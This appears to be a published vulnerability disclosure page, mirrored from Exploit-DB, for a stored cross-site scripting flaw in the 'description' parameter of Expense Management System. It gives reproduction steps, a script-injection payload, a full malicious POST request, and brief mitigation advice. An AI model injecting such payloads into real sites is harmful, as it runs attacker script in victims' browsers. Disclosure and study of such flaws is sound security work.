header-logo
Suggest Exploit
vendor:
Expense Management System
by:
Nikhil Kumar
8.8
CVSS
HIGH
Stored Cross Site Scripting
79
CWE
Product Name: Expense Management System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
2020

Expense Management System – ‘description’ Stored Cross Site Scripting

Expense Management System is vulnerable to Stored Cross Site Scripting. An attacker can inject malicious JavaScript code into the 'description' parameter of the 'expense_action.php' page. When a victim visits the page, the malicious code will be executed in the victim's browser.

Mitigation:

Input validation should be used to detect and reject malicious input. Sanitize the user input before using it in the application.
Source

Exploit-DB raw data:

# Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting
# Date: 02/12/2020
# Exploit Author: Nikhil Kumar
# Vendor Homepage: http://egavilanmedia.com/
# Software Link: http://egavilanmedia.com/expense-management-system/
# Tested On: Ubuntu

Vunerable Parameter: "description="

Steps to Reproduce:

1. Open the index.php page using following url 

http://localhost/Expense-Management-System/index.php

click on Add Expense

2. Put a payload on "description=" parameter

Payload :- test"><script>alert("XSS")</script>

Malicious Request::

POST /Expense-Management-System/expense_action.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 140
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/Expense-Management-System/
Cookie: PHPSESSID=45f122ec98900409467ac74f6113ff4a

description=test%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&amount=1234&date=2020%2F11%2F17&expense_id=&action=Add

Navigation

Suggest Exploit

Services By CQR